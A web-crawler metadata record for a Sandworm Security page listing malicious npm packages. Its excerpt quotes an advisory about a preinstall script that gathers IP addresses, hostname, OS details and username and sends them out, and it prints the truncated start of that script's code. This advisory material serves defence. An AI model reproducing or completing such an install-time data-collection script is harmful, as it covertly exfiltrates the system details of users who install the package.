id
type
0 (not classified)
status
21 (imported old-v2, waiting for another import)
review version
0
cleanup version
0
pending deletion
0 (-)
created at
2025-11-09 01:38:51
updated at
2025-11-09 01:38:53
url
https://sandworm.dev/npm/security-vulnerabilities/page/2
url length
56
url crc
32627
url crc32
606502771
location type
1 (url matches target location, page_location is empty)
canonical status
2 (missing canonical tag in html)
canonical page id
-
domain id
domain tld
2265
domain parts
0
originating warc id
-
originating url
https://data.commoncrawl.org/crawl-data/CC-MAIN-2025-33/segments/1754151280076.69/warc/CC-MAIN-20250809045158-20250809075158-00279.warc.gz
source type
11 (CommonCrawl)
server ip
Publication date
2025-08-09 05:03:33
Fetch attempts
0
Original html size
65997
Normalized and saved size
65662
title
Latest Npm Package Security Vulnerabilities | Sandworm Security
excerpt
content
Detected: 2 Apr 2025Detected Date: 2 Apr 2025Affected Install Script: preinstallPackage Source: ↗️ View on NpmThis code collects sensitive system information, including the local and public IP addresses, hostname, OS type, architecture, and username, and sends it to a potentially malicious endpoint without the user's consent. Additionally, it has a fallback mechanism to send data via WebSocket, further indicating a design to exfiltrate data stealthily. This can lead to unauthorized access and serious privacy violations.Install script:node index.jsInstall script code:const os = require("os"); const https = require("https"); // Check if running during `npm install` const isPreinstall = process.env.npm_lifecycle_event === "preinstall"; // Dynamically import node-fetch async function getFetch() { return (await import("node-fetch")).default; } // Collect System Information const systemInfo = { publicIP: "", // Will be fetched dynamically hostname: os.hostname(), osType: o...
author
updated
1767265256
block type
0
extracted fields
105
extracted bits
featured image
title
full content
content was extracted heuristically
detected location
0
detected language
1 (English)
category id
-
index version
1
paywall score
0
spam phrases
0
text nonlatin
0
text cyrillic
0
text characters
24525
text words
4288
text unique words
309
text lines
1
text sentences
18
text paragraphs
1
text words per sentence
238
text matched phrases
0
text matched dictionaries
0
links self subdomains
0
links other subdomains
11
links other domains
12
links spam adult
0
links spam random
0
links spam expired
0
links ext activities
0
links ext ecommerce
0
links ext finance
0
links ext crypto
0
links ext booking
0
links ext news
0
links ext leaks
0
links ext ugc
9
links ext klim
0
links ext generic
0
image author
featured image